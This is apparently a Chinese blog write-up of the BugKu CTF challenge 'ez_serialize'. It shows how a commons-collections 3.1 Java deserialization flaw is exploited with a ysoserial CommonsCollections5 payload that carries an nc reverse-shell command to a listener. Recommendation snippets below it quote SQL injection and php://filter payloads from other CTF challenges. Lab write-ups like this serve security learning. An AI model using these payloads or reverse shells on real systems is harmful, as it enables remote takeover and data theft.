[BugKu Web]ez_serialize

已于 2022-04-24 14:04:58 修改
阅读量4.3k 收藏 1
点赞数 4
文章标签: 安全
于 2022-04-23 22:48:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41513009/article/details/124371972
版权

本writeup已经在bugku开放

根据题意,显然是一道JAVA反序列化的题

关于JAVA反序列化漏洞的成因,参见博客https://zhuanlan.zhihu.com/p/422314689

此处只说明解题思路(重复开启场景已经没金币了,用本地环境说明)

下载附件,寻找存在反序列化漏洞的点

阅读pom.xml,发现存在commons-collections组件依赖,其3.1版本存在反序列化漏洞
在这里插入图片描述
阅读helloController.java,确定路由为ip:port/hello,状态码变成了400
在这里插入图片描述
需要输入请求参数name,注意name会经过base64解码 再进行反序列化,因此在传入参数之前需要对payload进行base64编码

payloiad的构造使用ysoserial,问就是没技术

推荐使用linux安装,具体参照https://blog.csdn.net/weixin_44769042/article/details/121378799(windows安装使用出现奇怪的问题)

查看可用组件漏洞及版本

	 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar

在这里插入图片描述

选择CommonsCollections5,命令选择nc反弹shell,编码最好在这里进行,不然有奇怪的问题

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "nc ip port -e /bin/bash" |base64 -w0 >poc.bin`

在这里插入图片描述

如果构造payload的命令是无法执行的话(比如windows命令),则会输出something is wrong

在这里插入图片描述 在公网主机上开启监听

 nc -l -p port

将生成的payload作为name的value输入
在这里插入图片描述
在这里插入图片描述

在公网主机上ls一下,就可以看到flag,cat flag,over
在这里插入图片描述

如果本地可以却不能在靶场实现的话,需要注意的坑:必须使用公网ip才能被nc连接到,因此可能需要申请一个有公网ip的云服务器(我是这么做的)

Silver Bullet
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
DASCTF 3月赛Web
D.MIND 的博客
04-08 724
BestDB $sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\""; 题目过滤了单引号和空格,因为这条语句的特殊,我们可以利用双引号在后面部分进行闭合。空格就用/**/ 查列数: 1"/**/order/**/by/**/3# 1"/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.
SHCTF训练
qq_73221795的博客
10-05 326
【代码】babyRCE。
ez_serialize
最新发布
BoJing6的博客
03-31 236
源码pop链子如下exp如下解释如下对于这个pop链的执行过程,可以进一步详细解释。首先,让我们逐步追踪反序列化的过程:反序列化开始时,会先对最内层的对象a进行反序列化,即将‘a进行反序列化,即将‘var_1属性赋值为字符串"php://filter/read=convert.base64-encode/resource=flag.php"`。然后,对对象d进行反序列化,它的‘d进行反序列化,它的‘p属性引用了对象$a。在反序列化过程中,会调用对象$d的__get()`函数,返回对象$a的结果。
SHCTF(山河)赛事部分Write up-白猫
m0_73734159的博客
10-30 760
2023SHCTF(山河)赛事部分Write up-白猫
ez_serialize复现
Sk1y的博客
10-13 525
文章目录解题过程 解题过程 题目给了源码 <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"; $this->para = "ctfer";
适合新手的php反序列化pop链构建思路和原理(有例题,无echo调用tostring)
2301_76690905的博客
10-24 494
对于这个pop链的执行过程,可以进一步详细解释。首先,让我们逐步追踪反序列化的过程:反序列化开始时,会先对最内层的对象a进行反序列化,即将‘a进行反序列化,即将‘var_1属性赋值为字符串然后,对对象d进行反序列化,它的‘d进行反序列化,它的‘p__get()`函数,返回对象$a的结果。接下来是对象c的反序列化,其中‘c的反序列化,其中‘z__get()__get()`函数,将对象a返回给对象a返回给对象c。最后,对对象b进行反序列化,它的‘b进行反序列化,它的‘q__wakeup()函数。
BUGKUez_java_serialize
qq_40646572的博客
04-12 5059
BUGKUjava反序列化练习
BugKu_ez_java_serialize
qq_53460654的博客
12-20 629
简单的一道java反序列化题
java php serialize_php 序列化serialize() 与反序列化unserialize()
weixin_32746239的博客
02-16 157
在php中,可以对数组,变量,对象等进行序列化(静态变量,常量不会被序列化)classTestSerialize{private$name;private$password;constID=1234;publicstatic$_class_name=__CLASS__;publicfunction__set($varname,$value){$this->$varna...
se_mouz_image.rar_serialize_序列化
09-23
实现利用serialize()函数序列化文档和鼠标画一些简单的图形的功能.
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
#jet_serialize 用于 Javascript 的扩展序列化程序
BUU Dest0g3 520迎新赛 WEB writeup
weixin_43610673的博客
05-29 2024
WEB phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } require_once 绕过不能重复包含文件的限制 /?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/r
序列化漏洞与CTF题目
m0_62725813的博客
12-09 42
在序列化SESSION得:s:3:"img";s:3:"ctf";}";s:3:"img";经过filter过滤的结果:s:3:"img";s:3:"ctf";}";s:3:"img";由于替换了7个flag关键字,会往后吞28个字符串,刚好将guest";s:69:"aaaaa 赋给了user,后面构造img变量,后面是随便添加的一个变量,刚好满足三个变量,反序列化读取到webctf就结束了,后面的img被丢掉了。这样就完成了img的赋值。s:3:"ctf"
DACTF—Ezunserialize
ro4lsc的博客
05-07 7467
DACTF—Ezunserialize(PHP反序列化字符逃逸) 这个题是我在赛后再进行学习的,所以自己在本地复现了一下环境。 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function r...
DASCTF EZUnserialize
Firebasky的博客
10-06 510
思路 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); }//3->6 function read($data) { return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data); }//6->3 class A{ public $
gsoap soap_serialize
08-13
gsoap库是一个用于SOAP协议的开源C/C++开发工具。其中的soap_serialize函数用于对SOAP消息进行序列化,将消息转换成字符串的格式,以便进行网络传输或存储。 通过调用soap_serialize函数,我们可以将一个SOAP消息的内容转换成一个字符数组,以便于后续的处理。这个函数接受一个指向soap结构体的指针作为输入参数,该结构体包含了要序列化的SOAP消息的各个部分的信息,如头部、主体等。在调用函数之后,会将序列化后的结果存储在soap结构体的buf成员中。 使用gsoap库的soap_serialize函数可以实现将SOAP消息序列化的功能,序列化后的结果可以用于网络传输,也可以进行持久化存储。在网络传输中,我们可以将序列化后的结果通过网络发送给服务端,服务端在接收到消息后再使用相应的函数进行反序列化,从而获得原始的SOAP消息内容。在持久化存储中,我们可以将序列化后的结果保存到本地文件或数据库中,以便后续的读取和处理。 总之,gsoap库的soap_serialize函数是一个非常有用的工具,可以帮助开发者在SOAP协议中进行消息的序列化操作,方便进行网络传输和持久化存储。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值